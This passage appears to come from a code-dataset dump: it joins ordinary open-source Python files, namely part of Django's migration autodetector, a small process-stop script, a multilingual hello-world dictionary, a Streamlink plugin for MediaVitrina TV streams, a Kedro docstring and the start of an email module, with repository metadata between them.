deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
# OK, add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
return self.migrations
def check_dependency(self, operation, dependency):
"""
Checks if an operation dependency matches an operation.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name.lower() == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name.lower() == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name.lower() == dependency[1].lower() and
operation.name.lower() == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name.lower() == dependency[1].lower() and
operation.name.lower() == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name.lower() == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name.lower() == dependency[1].lower() and
operation.name.lower() == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name.lower() == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
added_models = set(self.new_model_keys) - set(self.old_model_keys)
added_unmanaged_models = set(self.new_unmanaged_keys) - set(self.old_unmanaged_keys)
models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.rel:
if field.rel.to:
if field.primary_key:
primary_key_rel = field.rel.to
else:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
deleted_models = set(self.old_model_keys) - set(self.new_model_keys)
deleted_unmanaged_models = set(self.old_unmanaged_keys) - set(self.new_unmanaged_keys)
models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.rel:
if field.rel.to:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.get_all_related_objects():
dependencies.append((
related_object.model._meta.app_label,
related_object.model._meta.object_name,
related_object.field.name,
False,
))
dependencies.append((
related_object.model._meta.app_label,
related_object.model._meta.object_name,
related_object.field.name,
"alter",
))
for related_object in model._meta.get_all_related_many_to_many_objects():
dependencies.append((
related_object.model._meta.app_label,
related_object.model._meta.object_name,
related_object.field.name,
False,
))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name.lower()), None)
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.rel and field.rel.to and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.rel and field.rel.to:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# You can't just add NOT NULL fields with no default
if not field.null and not field.has_default() and not isinstance(field, models.ManyToManyField):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=False,
),
dependencies=dependencies,
)
else:
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an order_with_respect_to;
# this is safely ignored if there isn't one
dependencies=[(app_label, model_name, field_name, "order_wrt_unset")],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
new_model_state = self.to_state.models[app_label, model_name]
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field_by_name(old_field_name)[0]
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
rename_key = (
new_field.rel.to._meta.app_label,
new_field.rel.to._meta.object_name.lower(),
)
if rename_key in self.renamed_models:
new_field.rel.to = old_field.rel.to
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=new_model_state.get_field_by_name(field_name),
)
)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = set([
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
])
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.options.get("order_with_respect_to", None) != new_model_state.options.get("order_with_respect_to", None):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to", None):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
),
dependencies=dependencies,
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name.lower()
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name.lower()
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name.lower(), ops[0].name.lower())
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name.lower(), ops[0].name.lower())
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name.lower() for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
| 48.226504 | 166 | 0.564146 |
dfb6047fbe6b560b57045a08d9b45a7fd849fc4c | 530 | py | Python | plico_dm_server/scripts/plico_dm_stop.py | lbusoni/palpao_server | 4531fc60904433c81bdad1e631cd06c4ae13e76c | [
"MIT"
] | null | null | null | plico_dm_server/scripts/plico_dm_stop.py | lbusoni/palpao_server | 4531fc60904433c81bdad1e631cd06c4ae13e76c | [
"MIT"
] | 3 | 2022-01-19T23:58:01.000Z | 2022-02-25T12:15:49.000Z | plico_dm_server/scripts/plico_dm_stop.py | ArcetriAdaptiveOptics/plico_dm_server | da8d2797ac92a4c12d034a0c2da4b50a074beade | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import logging
from plico.utils.kill_process_by_name import killProcessByName
from plico_dm_server.utils.constants import Constants
__version__= "$Id: plico_dm_stop.py 27 2018-01-27 08:48:07Z lbusoni $"
def main():
logging.basicConfig(level=logging.INFO)
processNames= [Constants.START_PROCESS_NAME,
Constants.controller_1_PROCESS_NAME,
Constants.controller_2_PROCESS_NAME,
]
for each in processNames:
killProcessByName(each)
| 27.894737 | 70 | 0.707547 |
cf7e9adfb2d71939c0a362af95850b25eff02587 | 2,203 | py | Python | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null |
greetings = {
"Italian": "Ciao mondo",
"Irish": "Dia duit Domhanda",
"French": "Bonjour le monde",
"English": "Hello World",
"Australian": "G'day World",
"German": "Hallo Welt",
"Hungarian": "Helló Világ",
"Czech": "Ahoj světe",
"Dutch": "Hallo Wereld",
"Danish": "Hej Verden",
"Swedish": "Hej världen",
"Lithuanian": "Labas pasauli",
"Latin": "salve Orbis Terrarum",
"Spanish" : "Hola Mundo",
"Catalan" : "Hola món",
"Hawaiian": "Aloha kākou honua",
"Afrikaans": "Hello Wêreld",
"Swahili" : "Salamu, Dunia",
"Zulu": "Sawubona Mhlaba",
"Greek": "Γειά σου Κόσμε",
"Uyghur": "ياخشىمۇسىز دۇنيا",
"Urdu": "ہیلو ورلڈ",
"Arabic": "مرحبا بالعالم",
"Sindhi": "هيلو ورلڊ",
"Hebrew": "שלום עולם",
"Yiddish": "העלא וועלט",
"Armenian": "Բարեւ աշխարհ",
"Mongolian": "Сайн уу",
"Chinese": "你好,世界",
"Korean": "안녕 세상",
"Japanese": "こんにちは世界",
"Vietnamese": "Chào thế giới",
"Lao": "ສະບາຍດີຊາວໂລກ",
"Burmese": "မင်္ဂလာပါကမ္ဘာလောက",
"Thai": "สวัสดีชาวโลก",
"Telugu": "హలో వరల్డ్",
"Hindi" : "नमस्ते दुनिया",
"Tamil": "ஹலோ வேர்ல்ட்",
"Gujarati": "હેલો વર્લ્ડ",
"Nepali": "नमस्कार संसार",
"Marathi": "हॅलो वर्ल्ड",
"Malayalam": "ഹലോ വേൾഡ്",
"Bangla": "ওহে বিশ্ব",
"Kannada": "ಹಲೋ ವರ್ಲ್ಡ್",
"Sinhala": "හෙලෝ වර්ල්ඩ්",
"Russian": "Привет, мир",
"Kyrgyz": "салам дүйнө",
"Ukranian": "Привіт Світ",
"Bulgarian": "Здравей свят",
"Macedonian": "Здраво свету",
"Tajik": "Салом Ҷаҳон",
"Tatar" : "Сәлам, Дөнья",
"Uzbek": "Salom Dunyo",
"Polish": "Witaj świecie",
"Georgian": "Გამარჯობა მსოფლიო",
}
def main():
for lang in greetings:
message = greetings[lang]
l = len(message)
print("Howdy", l, lang, message)
#for c in message:
# print ("character:", c)
main()
| 28.61039 | 43 | 0.460735 |
7db29590c736b1cad9768e649bbc4e836fdd1c43 | 2,700 | py | Python | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | import logging
import re
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils.url import update_qsd
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r"https?://(?P<channel>ctc(?:love)?|chetv|domashniy|5-tv)\.ru/(?:online|live)"
))
@pluginmatcher(re.compile(
r"https?://(?P<channel>ren)\.tv/live"
))
@pluginmatcher(re.compile(
r"https?://player\.mediavitrina\.ru/(?P<channel>[^/?]+.)(?:/[^/]+)?/\w+/player\.html"
))
class MediaVitrina(Plugin):
def _get_streams(self):
channel = self.match.group("channel")
channels = [
# ((channels), (path, channel))
(("5-tv", "tv-5", "5tv"), ("tv5", "tv-5")),
(("chetv", "ctc-che", "che_ext"), ("ctc", "ctc-che")),
(("ctc"), ("ctc", "ctc")),
(("ctclove", "ctc-love", "ctc_love_ext"), ("ctc", "ctc-love")),
(("domashniy", "ctc-dom", "domashniy_ext"), ("ctc", "ctc-dom")),
(("iz"), ("iz", "iz")),
(("mir"), ("mtrkmir", "mir")),
(("muztv"), ("muztv", "muztv")),
(("ren", "ren-tv", "rentv"), ("nmg", "ren-tv")),
(("russia1"), ("vgtrk", "russia1")),
(("russia24"), ("vgtrk", "russia24")),
(("russiak", "kultura"), ("vgtrk", "russiak")),
(("spas"), ("spas", "spas")),
(("tvc"), ("tvc", "tvc")),
(("tvzvezda", "zvezda"), ("zvezda", "zvezda")),
(("u", "u_ott"), ("utv", "u_ott")),
]
for c in channels:
if channel in c[0]:
path, channel = c[1]
break
else:
log.error(f"Unsupported channel: {channel}")
return
res_token = self.session.http.get(
"https://media.mediavitrina.ru/get_token",
schema=validate.Schema(
validate.parse_json(),
{"result": {"token": str}},
validate.get("result"),
))
url = self.session.http.get(
update_qsd(f"https://media.mediavitrina.ru/api/v2/{path}/playlist/{channel}_as_array.json", qsd=res_token),
schema=validate.Schema(
validate.parse_json(),
{"hls": [validate.url()]},
validate.get("hls"),
validate.get(0),
))
if not url:
return
if "georestrictions" in url:
log.error("Stream is geo-restricted")
return
yield from HLSStream.parse_variant_playlist(self.session, url, name_fmt="{pixels}_{bitrate}").items()
__plugin__ = MediaVitrina
| 34.615385 | 119 | 0.505556 |
a3b6f56ce5f62508cce22f75f3548c02ef5c52fd | 238 | py | Python | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 2,047 | 2022-01-10T15:22:12.000Z | 2022-03-31T13:38:56.000Z | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 170 | 2022-01-10T12:44:31.000Z | 2022-03-31T17:01:24.000Z | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 112 | 2022-01-10T19:15:24.000Z | 2022-03-30T11:20:52.000Z | """Example code for the nodes in the example pipeline. This code is meant
just for illustrating basic Kedro features.
PLEASE DELETE THIS FILE ONCE YOU START WORKING ON YOUR OWN PROJECT!
"""
from .pipeline import create_pipeline # NOQA
| 29.75 | 73 | 0.781513 |
1373129657f5b21c1aeafaa047d30c85dbe40199 | 3,557 | py | Python | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 833 | 2016-09-08T13:27:36.000Z | 2022-03-27T07:10:48.000Z | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 528 | 2016-05-23T09:17:04.000Z | 2022-03-30T12:45:50.000Z | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 214 | 2016-09-08T14:46:41.000Z | 2022-03-25T01:04:14.000Z | import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
